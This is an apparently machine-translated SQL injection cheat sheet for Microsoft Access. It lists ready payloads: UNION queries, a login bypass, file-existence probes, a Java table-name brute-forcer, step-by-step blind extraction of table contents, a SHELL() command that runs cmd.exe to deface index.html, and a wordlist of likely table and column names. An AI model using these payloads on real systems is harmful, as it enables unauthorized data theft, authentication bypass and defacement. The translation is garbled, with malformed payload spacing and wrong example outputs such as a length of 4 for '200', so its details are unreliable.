Access SQL Injection Reference Manual (small copy)

Access SQL Injection reference
Description	SQL query and comment
Annotator	Access does not have a special annotator. Therefore, "/*", "--" and "#" cannot be used. However, you can use the NULL character "NULL" (% 00) instead: 'Union SELECT 1, 1 FROM validTableName % 00
Syntax error message	"[Microsoft] [Driver ODBC Microsoft Access]"
Multi-sentence execution	Not supported.
Joint Query	Access supports UNION query. The FROM keyword after UNION must use an existing table name.
Affiliated Query	Access supports secondary queries (for example:"TOP 1"Used to return the content of the first line ): 'AND (select top 1 'somedata' FROM validTableName) % 00
LIMIT support	LIMIT is not supported, but can be declared in the query"Top n"To limit the number of rows returned: 'Union select top 3 AttrName FROM validTableName % 00: This statement returns 3 rows (first.
Returns 0 rows for the query.	It is useful when the script only displays the results of the first query in the returned HTML results: 'AND 1 = 0 union select AttrName1, AttrName2 FROM validTableName % 00
String connection	CONCAT () functions are not supported. You can use the "&" or "+" operation to connect two strings. URLencode must be used to encode these two operators: 'Union select' web '% 2b 'app' FROM validTableName % 00: Return "webapp" 'Union select' web '% 26' app' FROM validTableName % 00: Return "webapp"
Substring	MID () function: 'Union select mid ('abcd', 1, 1) FROM validTableName % 00: Return "" 'Union select mid ('abcd', 2, 1) FROM validTableName % 00: Return "B"
String Length	LEN () function: 'Union select len ('200') FROM validTableName % 00: 4 is returned.
Brute-force WEB path	You can perform the SELECT operation on a database that does not exist. Access will respond to an error message containing the complete path .: 'Union SELECT 1 FROM thisafakename. FakeTable % 00
Returns the ASCII value of a character.	ASC () function: 'Union select asc ('A') FROM ValidTable % 00: Returns the ASCII value of 65 ('A)
Convert ASCII values to characters	CHR () function: 'Union select chr (65) FROM validTableName % 00: 'A' is returned'
IF statement	You can use the IIF () function. Syntax: IIF (condition, true, false ): 'Union select iif (1 = 1, 'A', 'B') FROM validTableName % 00: 'A' is returned'
Time Interface	There are no functions similar to BENCHMARK () or SLEEP (), but you can use a large number of (high load) queries to achieve this effect.Click here for Reference.
Verify whether the file exists	Use it during injection: 'Union SELECT name FROM msysobjects IN '\ boot. ini' % 00: (If the file exists) an error message is returned: it informs that the database format was not recognized.
Table Name guessing	Here is a simple java code to guess the access table name. I wrote it to better explain the principle of table name guessing: Static private String columnErrorMessage = "..."; Static private String accessError = "..."; [...] Public String bruteTableName (Request r) {// 0 String resp = new String (); String [] table = {"tab_name1", "tab_name2",..., "tab_nameN"}; // 1 For (int I = 0; I <table. length; I ++ ){ Resp = sendInjection (r, "'Union SELECT 1 FROM" + table [I] + "% 00"); // 2 If (resp. contains (columnErrorMessage) |! Resp. contains (accessError) // 3 Return table [I]; } Return null; } BruteTableName ()The parameter is an object named "Request" (see Note 0). In this exampleSendInjection ()(See note 2) Try to check the query: 'Union SELECT 1 FROM table [I] % 00 Table [I]Is an element in the Table Name List (see note 1). You can find a small table name list at the end of this article. In Note 2,SendInjection ()The function returns the response html code after the injection code is submitted. IfRespIncludeColumnErrorMessageString (see note 3). Congratulations, you have found an existing table.ColumnErrorMessageThe error message returned when the number of volumes in the UNION query is different from that in the primary query. If the table does not exist, the returned information is that the table does not exist, rather than the number of volumes.
Column name guess	The number of columns that require a known table name and primary query: 'Union SELECT fieldName [j], 1,1, 1 FROM validTableName % 00 You can modify the example above (change table to fieldname). If the table does not exist, an error message indicating that the column does not exist will be returned.
Bypass Login	User name:'OR 1 = 1% 00(Or"OR 1 = 1% 00) Password: (leave blank)
Column name Enumeration	Additional Terms: This principle has been tested on JBoss (A. jsp script with Access Vulnerability), but cannot be guaranteed to be available in other environments. In general, if the SQL injection vulnerability exists, when you add a "'" after the URL parameter, you will get some error information, such: Error (...) syntax (...) query (...): "Id = 0 '" From this information, we can see that the current table has a column "ID ". programmers usually use the same URL parameters, column names, and table names. when you know a parameter, you can use mssql to enumerate other table names and column names: 'Group BY Id % 00 Now you will get a new error message containing another new column name. You can continue to enumerate other table names like this: 'Group BY Id, SecondAttrName,... % 00 Until all table names are obtained.
Interaction with the operating system
These functions are unavailable by default.
Security Prompt	You can modify the Registry to lock the use of some controversial functions (such as SHELL (), and so on ...): \ HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Jet \ 4.0 \ engines \ SandboxMode The default value is 2, so these functions are not available by default. Next I will introduce you to the situation where the registry value is set to 0.
Get Current Directory	The number of columns that require a known table name and primary query: 'Union SELECT CurDir (), 1, 1 FROM validTableName % 00
Execute system commands	The SHELL () function can be used to execute system commands: 'AND SHELL('cmd.exe/c echo owned> c: \ path \ name \ index.html') % 00
Access System Table
These system tables are not accessible by default.
MSysAccessXML	Columns in the table: Id LValue ObjectGuid ObjectName Property Value
MSysACEs	Columns in the table: ACM FInheritable ObjectId SID
MSysObjects	Here we can get the table name: Connect Database DataCreate DataUpdate Flags ForeignName Id Lv LxExtra LvModule LvProp Name Owner ParentId RmtInfoLong RmtInfoShort Type This query can be used to obtain the table name in the database: 'Union SELECT Name FROM MSysObjects WHERE Type = 1% 00
Access blind note (these steps are used to guess the content of the table)
Step 1: Guess the table name	You can use the dictionary provided below to guess the table name. Inject the query statement: 'AND (select top 1 1 FROM TableNameToBruteforce [I]) % 00 After the injection query statement is submitted, if the HTML returned by you is the same as the normal page, the table exists. (because"AND 1"Does not affect the query ).
Step 2: Guess the column name	Use the following query when the table name is instructed: 'AND (select top 1 FieldNameToBruteForce [j] FROM table) % 00 Use the same method as step 1 to determine whether a Column exists.
Step 3: Guess the number of rows	In the next step, you must know the number of rows in the table. It will be used in the following query"TAB_LEN"Variable: 'And iif (select count (*) FROM validTableName) = X, 1, 0) % 00 Here"X"Is any value greater than 0. You can use the old method to determine the exact value of "X.
Step 4: Guess the Content Length	You can use the following statement to obtain"ATTRIB"Content Length of the first row of the column: 'And iif (select top 1 LEN (ATTRIB) FROM validTableName) = X, 1, 0) % 00 You can use the following statement to guess"ATTRIB"The second row in the column to the secondTAB_LENThe length of the row content (here the value of N is 2 andTAB_LEN (obtained earlier)): 'And iif (select top n len (ATTRIB) FROM validTableName where attrib <> 'value1' and attrib <> 'value2 '... (etc )...) = KKK, 1, 0) % "KKK" Any value greater than 0.ATTRIB <> 'valuexxx'The reason is that we have to select a specific row to guess. the method I think of is"TOP N"The row value is excluded, and the remaining row is the row being guessed. Of course, there is a premise here"ATTRIB"Must be a primary key. Here is an example:   A1 A2 A3 1111 2222 3333 0000 4444 Oooo Aaaa Bbbb Cccc You can obtain the length of all content in the first line as follows: 'And iif (select top 1 LEN (A1) FROM Table) = KKK, 1, 0) % 00 'And iif (select top 1 LEN (A2) FROM Table) = KKK, 1, 0) % 00 'And iif (select top 1 LEN (A3) FROM Table) = KKK, 1, 0) % 00 Then we can obtain the length of the content of the second line (assumingA1Is the table's primary key ): 'And iif (select top 2 LEN (A1) FROM Table WHERE A1 <> '20140901') = KKK, 1, 0) % 00 'And iif (select top 2 LEN (A2) FROM Table WHERE A1 <> '20140901') = KKK, 1, 0) % 00 'And iif (select top 2 LEN (A3) FROM Table WHERE A1 <> '20140901') = KKK, 1, 0) % 00 The third line is the same: 'And iif (select top 3 LEN (A1) FROM Table WHERE A1 <> '20160901' AND A1 <> '20160901') = KKK, 1, 0) % 00 'And iif (select top 3 LEN (A2) FROM Table WHERE A1 <> '20160901' AND A1 <> '20160901') = KKK, 1, 0) % 00 'And iif (select top 3 LEN (A3) FROM Table WHERE A1 <> '20160901' AND A1 <> '20160901') = KKK, 1, 0) % 00 Obviously, you must obtain the content of all the previous rows (you need to put it after WHERE) after you guess the length of the content after the first row (2nd to the TAB_LEN row ).
Step 5: Guess the content	Suppose the attacker knows the table and column name, and uses the following query: 'And iif (select top n mid (ATTRIBxxx, XXX, 1) FROM validTableName WHERE ATT_key <> 'value1' AND ATT_key <> 'value2' ... Etc...) = CHAR (YYY), 1, 0) % 00 "N"Is the row to be guessed,"XXX"Yes"ATTRIBxxx"The X byte,"ATT_key"Is the primary key of the table."YYY"It is a number between 0 and 255 (it represents the ASCII code of a character). Here we should use the method mentioned above to guess the content of other rows.
Table Name/column name (dictionary)
Table Name/column name (dictionary)	Here is a small table/column name sample dictionary, which may be used in the guess:   Account, accnt, accnt, user_id, members, usrs, usr2, accounts, admin, admins, adminlogin, auth, authenticate, authentication, account, access; Customers, customer, config, conf, cfg; Hash; Login, logout, loginout, log; Member, memberid; Password, pass_hash, pass, passwd, passw, pword, pwrd, pwd; Store, store1, store2, store3, store4, setting; Username, name, user, user_name, user_username, uname, user_uname, usern, user_usern, un, user_un, usrnm, user_usrnm, usr, usernm, user_usernm, user_nm, user_password, userpass, user_pass, user_pword, user_passw, user_pwrd, user_pwd, user_passwd;